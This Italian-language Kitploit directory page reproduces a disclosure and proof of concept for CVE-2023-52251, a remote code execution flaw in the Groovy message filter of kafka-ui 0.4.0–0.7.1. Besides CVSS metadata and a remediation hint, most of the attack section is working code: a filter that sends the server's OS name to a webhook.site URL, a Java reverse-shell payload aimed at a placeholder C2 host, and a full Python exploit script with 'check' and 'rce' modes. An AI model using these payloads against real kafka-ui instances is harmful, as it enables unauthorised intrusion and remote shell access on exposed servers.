Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-52251-POC — CVE-2023-52251 Esiste una vulnerabilità di esecuzione di codice in remoto in provectus/kafka-ui. | Kitploit
Strumenti/GitHubGitHub/bobtheshoplifter/cve-2023-52251-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubbobtheshoplifter/cve-2023-52251-poc

CVE-2023-52251-POC

CVE-2023-52251 Esiste una vulnerabilità di esecuzione di codice in remoto in provectus/kafka-ui.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2132 anni faRevisionato da Kitploit

CVE-2023-52251-POC

Esiste una vulnerabilità di Remote Code Execution in provectus/kafka-ui. Al momento della stesura non esiste una patch, ma il vendor è stato avvisato da noi e dal team di VINCE senza alcuna risposta. La segnalazione è stata inviata il 27 settembre 2023 a provectus sia via email che tramite GitHub Security.

Rimedio

Suggeriamo di commentare l'intera funzione del filtro groovy/aggiungere l'autenticazione come minimo.

Metadati

TitoloValore
Stringa CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
ID CVECVE-2023-52251
Descrizione CVSÈ stato scoperto che provectus kafka-ui 0.4.0-0.7.1 contiene una vulnerabilità di esecuzione remota di comandi (RCE) tramite il parametro q in /api/clusters/local/topics/{topic}/messages
Punteggio CVSS9.x
CWECWE-94: Improper Control of Generation of Code ('Code Injection')
FornitoreProvectus
Prodottokafka-ui
Linkhttps://github.com/provectus/kafka-ui
Versioni interessate0.4.0-0.7.1
Versioni corretteNessuna
ContributoriThingstad, BobTheShoplifter

Dettagli

Tipo di vulnerabilità: Esecuzione remota di codice (RCE)

Software interessato: Kafka-ui

Versione: [0.4.0-0.7.1]

Descrizione della vulnerabilità

Non c'è alcuna sanitizzazione del filtro script groovy prima che venga eseguito. Questo consente a un attaccante di eseguire codice arbitrario sul server.

Riferimento al codice sorgente

Nella funzione groovyScriptFilter lo "script" non viene sanitizzato prima di essere eseguito.

E viene valutato tramite eval nel motore:

root@kitploit:~
var result = compiledScript.eval(bindings);

https://github.com/provectus/kafka-ui/blob/master/kafka-ui-api/src/main/java/com/provectus/kafka/ui/emitter/MessageFilters.java#58

PoC

Istruzioni complete, inclusi i dettagli di configurazione specifici, per riprodurre la vulnerabilità.

Usando il filtro:

root@kitploit:~
new URL("https://webhook.site/xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx/" + System.getProperty("os.name")).text

Screenshot del filtro

Invierà una richiesta al webhook con il nome del sistema operativo del server.

Screenshot del webhook

Approfondendo ulteriormente, possiamo usare il seguente payload per ottenere una reverse shell:

root@kitploit:~
String host="xxx.xxx.xxx.xx";int port=8080;String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Il payload può essere generato facilmente su https://www.revshells.com/.

Reverse shell

Ed è stata creata anche una PoC in Python:

root@kitploit:~
from time import sleep
import requests
import json
import urllib
import argparse

url = 'http://localhost:8080'
clusters = None
c2 = "xxx.xxx.xxx.xx"
port = "8080"
mode = "check"


def get_clusters():
    global clusters
    clusterfetch = requests.get(url + '/api/clusters')
    clusters = clusterfetch.json()


def get_topics(cluster):
    topicfetch = requests.get(
        url + f'/api/clusters/{cluster}/topics?showInternal=true&search=&orderBy=NAME&sortOrder=ASC')
    topics = topicfetch.json()['topics']
    return topics


def get_webhooks():
    webhookfetch = requests.post('https://webhook.site/token')
    webhook = 'https://webhook.site/' + webhookfetch.json()['uuid']+"/"
    print('URL Created: ' + webhook)
    token_id = webhookfetch.json()['uuid']
    headers = {"api-key": webhookfetch.json()['uuid']}
    return webhook, token_id, headers


def Exploit():
    try:
        get_clusters()

        cluster = clusters[0]['name']

        topics = get_topics(cluster)
        topic = topics[0]['name']

        webhook, token_id, headers = get_webhooks()

        checkpayload = 'new URL("'+webhook+'").text'

        rcepayload = 'String host="' + c2 + \
            '";int port='+port + \
            ';String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();'

        payload = rcepayload if mode == "rce" else checkpayload

        r = requests.get(
            url + f'/api/clusters/local/topics/{topic}/messages?q={urllib.parse.quote(payload)}&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING', timeout=60)
        print(r.text)

        r = requests.get('https://webhook.site/token/' + token_id +
                         '/requests?sorting=newest', headers=headers)

        if r.json()['data'] == []:
            print("No rce found")
        else:
            for request in r.json()['data']:
                print(request)
                print("Rce found")

    except KeyboardInterrupt:
        print("KeyboardInterrupt")
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Kafka-ui4shell rce.')
    parser.add_argument('--mode', help='check, rce', required=False,
                        choices=['check', 'rce'], default="check")
    parser.add_argument(
        '--url', help='Target url. Example http://localhost:8080', required=True)
    parser.add_argument('--c2', help='C2 ip for RCE',
                        required=False),
    parser.add_argument('--c2port', help='File with urls', required=False)
    args = parser.parse_args()

    if args.mode == "rce":
        # Check if c2 and c2port are set
        if args.c2 and args.c2port:
            c2 = args.c2
            port = args.c2port
            mode = args.mode
            Exploit()
            exit()
        else:
            print("C2 and C2 port are required for RCE")
            exit()

    if args.url:
        url = args.url
        if args.mode:
            mode = args.mode
        if args.c2:
            c2 = args.c2
        if args.c2port:
            port = args.c2port
        Exploit()
        exit()

    else:
        parser.print_help()

Impatto

Questa vulnerabilità consente a un attaccante di eseguire codice arbitrario sul server. Può essere utilizzata per ottenere accesso al server e compromettere ulteriormente il sistema. Questa vulnerabilità è sfruttabile da qualsiasi utente con accesso all'interfaccia web di kafka-ui.

Al momento della stesura, ci sono più di 1.000 istanze di kafka-ui esposte su internet secondo Cencys. Tutte queste istanze potrebbero essere vulnerabili a questo attacco.

Screenshot di Cencys

È inoltre probabile che questo software venga eseguito su reti interne, dove un attaccante potrebbe ottenere accesso alla rete e sfruttare questa vulnerabilità.

Contributori

Lars Thingstad - @Thingstad Daniel Christensen - @BobTheShoplifter

Riferimenti

  • https://cwe.mitre.org/data/definitions/94.html
Scarica lo strumento